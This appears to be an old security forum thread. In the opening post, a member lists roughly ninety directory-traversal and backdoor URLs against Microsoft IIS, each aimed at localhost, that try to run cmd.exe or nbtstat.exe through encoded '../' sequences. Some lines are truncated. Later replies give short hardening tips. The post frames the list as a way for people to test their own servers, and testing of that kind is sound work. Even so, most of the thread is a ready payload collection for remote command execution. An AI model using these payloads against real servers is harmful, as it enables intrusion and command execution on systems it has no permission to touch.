101 traversal Xploits
Results 1 to 4 of 4

Thread: 101 traversal Xploits

  1. #1
    Senior Member
    Join Date
    Apr 2002
    Posts
    324

    Arrow 101 traversal Xploits

    I get scanned by people looking for directory traversal explots all the time and I have an SQL filter set up that allow me to keep track of these suspect requests.

    The problem is that such a vulnerablility scanner is very simple to make (see my tutorial on Scripting Internet Connections Under Window$ for more information). If you are worried about this sort of intrusion (and you use IIS) see my tutorial entitled Securing an installation of IIS 4. (No, seriously) .

    I almost wrote a tutorial using the TCPUtil code documented in the 'Scripting connections' article to show how such a vulnerability scanner could be written, but decided against it - anyone who can't figure it out from that article...well I'm not going to draw the skiddies a picture.

    I am providing these traversal exploits here so that you can test them against _YOUR_OWN_ servers (note the IP address), and I do have a future tutorial planned on how to create your own simple IDS for web based services (with the SQL filter I described above) when I get a minute. Watch this space.

    So - the traversals...

    http://127.0.0.1/..%2e..%2ewinnt/sys...cmd.exe?/c+dir
    http://127.0.0.1/..%5c..%5cwinnt/sys...cmd.exe?/c+dir
    http://127.0.0.1/_mem_bin/..%5c../.....cmd.exe?/c+dir
    http://127.0.0.1/_vti_bin/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/_vti_bin/..%5c..%5c...nbtstat.exe?-s
    http://127.0.0.1/_vti_bin/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/_vti_bin/..%5c../.....cmd.exe?/c+dir
    http://127.0.0.1/_vti_bin/..%qf../....cmd.exe?/c+dir
    http://127.0.0.1/_vti_cnf/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/_vti_cnf/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/_vti_log/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/adsamples/..%5c..%5...cmd.exe?/c+dir
    http://127.0.0.1/adsamples/..%5c..%5...cmd.exe?/c+dir
    http://127.0.0.1/adsamples/..%5c..%5...cmd.exe?/c+dir
    http://127.0.0.1/adsamples/cmd1.exe?/c+dir
    http://127.0.0.1/adsamples/root.exe?/c+dir
    http://127.0.0.1/c/winnt/system32/cmd.exe?/c+dir
    http://127.0.0.1/cgi-bin/..%5c..%5c....cmd.exe?/c+dir
    http://127.0.0.1/cgi-bin/..%5c..%5c....cmd.exe?/c+dir
    http://127.0.0.1/cgi-bin/..%5c../..%...nbtstat.exe?-s
    http://127.0.0.1/cgi-bin/cmd1.exe?/c+dir
    http://127.0.0.1/cgi-bin/root.exe?/c+dir
    http://127.0.0.1/cmd1.exe?/c+dir
    http://127.0.0.1/d/winnt/system32/cmd.exe?/c+dir
    http://127.0.0.1/iisadmpwd/..%2f..%2...cmd.exe?/c+dir
    http://127.0.0.1/iisadmpwd/..%2f..%2...nbtstat.exe?-s
    http://127.0.0.1/iisadmpwd/..%5c..%5...cmd.exe?/c+dir
    http://127.0.0.1/iisadmpwd/..%5c..%5...nbtstat.exe?-s
    http://127.0.0.1/iisadmpwd/..%5c../....cmd.exe?/c+dir
    http://127.0.0.1/iisadmpwd/..%pc../...cmd.exe?/c+dir
    http://127.0.0.1/iisadmpwd/cmd1.exe?/c+dir
    http://127.0.0.1/iisadmpwd/root.exe?/c+dir
    http://127.0.0.1/iissamples/cmd1.exe?/c+dir
    http://127.0.0.1/iissamples/root.exe?/c+dir
    http://127.0.0.1/images/cmd1.exe?/c+dir
    http://127.0.0.1/images/root.exe?/c+dir
    http://127.0.0.1/msadc/..%2e..%2ewin...cmd.exe?/c+dir
    http://127.0.0.1/msadc/..%5c..%5c..%...cmd.exe?/c+dir
    http://127.0.0.1/msadc/..%5c..%5c..%...nbtstat.exe?-s
    http://127.0.0.1/msadc/..%5c../..%5c...cmd.exe?/c+dir
    http://127.0.0.1/msadc/..%5c../..%5c...cmd.exe?/c+dir
    http://127.0.0.1/msadc/..%pc../..%...cmd.exe?/c+dir
    http://127.0.0.1/msadc/cmd1.exe?/c+dir
    http://127.0.0.1/MSADC/root.exe?/c+dir
    http://127.0.0.1/PBServer/..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/PBServer/..%5c..%5c...nbtstat.exe?-s
    http://127.0.0.1/root.exe?/c+dir
    http://127.0.0.1/Rpc/..%5c..%5c..%5c...cmd.exe?/c+dir
    http://127.0.0.1/Rpc/..%5c..%5c..%5c...nbtstat.exe?-s
    http://127.0.0.1/samples/..%5c..%5c....cmd.exe?/c+dir
    http://127.0.0.1/samples/..%5c..%5c....cmd.exe?/c+dir
    http://127.0.0.1/samples/cmd1.exe?/c+dir
    http://127.0.0.1/samples/root.exe?/c+dir
    http://127.0.0.1/scripts/.%2e/.%2e/w...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%2e..%2ew...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%2f..%2f....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%2f..%2fw...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%2f../win...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%5c%5c../...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%5c..%5c....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%5c..%5cw...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%5c..%5cw...nbtstat.exe?-s
    http://127.0.0.1/scripts/..%5c../..%...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%5c../win...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..../.....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..../winn...cmd.exe?/c+dir
    http://127.0.0.1/scripts/.........cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%8s../.....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%8s../wi...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%9v../.....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%9v../wi...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%pc../.....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%pc../wi...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%qf../.....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..%qf../wi...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..o../..o.....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..o../winnt...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..../....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..../w...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..../...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..../...cmd.exe?/c+dir
    http://127.0.0.1/scripts/..../.....cmd.exe?/c+dir
    http://127.0.0.1/scripts/..../wi...cmd.exe?/c+dir
    http://127.0.0.1/scripts/cmd1.exe?/c+dir
    http://127.0.0.1/scripts/root.exe?/c+dir
    http://127.0.0.1/scripts/shell.exe?/c+dir
    http://127.0.0.1/scripts/winnt/system32/cmd.exe?/c+dir
    http://127.0.0.1/winnt/system32/cmd.exe?/c+dir
    http://127.0.0.1/winnt/system32/nbtstat.exe?-s
    http://127.0.0.1/wwwroot/cmd1.exe?/c+dir
    http://127.0.0.1/wwwroot/root.exe?/c+dir
    \"I may not agree with what you say, but I will defend to the death your right to say it.\"
    Sir Winston Churchill.

  2. #2
    Senior Member
    Join Date
    Apr 2002
    Posts
    324
    Oh and btw - the simplest way to avoid this sort of exploit is to have all your sites hosted on a seperate hard drive to your O/S.

    You can also nulify the effect of someone scanning an IP range by making your default site (W3SVC1) resticted to 127.0.0.1 so someone scanning by IP will always get 403 - unauthorised.
    \"I may not agree with what you say, but I will defend to the death your right to say it.\"
    Sir Winston Churchill.

  3. #3
    Senior Member
    Join Date
    Nov 2001
    Location
    Ireland
    Posts
    735
    None of these worked on my server, because each link is either OS NT or HTTP IIS. Whereas I am using RedHat with an Apache server. fl00t!

  4. #4
    Senior Member
    Join Date
    Apr 2002
    Posts
    324
    Yes - that's another good way to be secure... Pick a secure O/S...
    \"I may not agree with what you say, but I will defend to the death your right to say it.\"
    Sir Winston Churchill.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •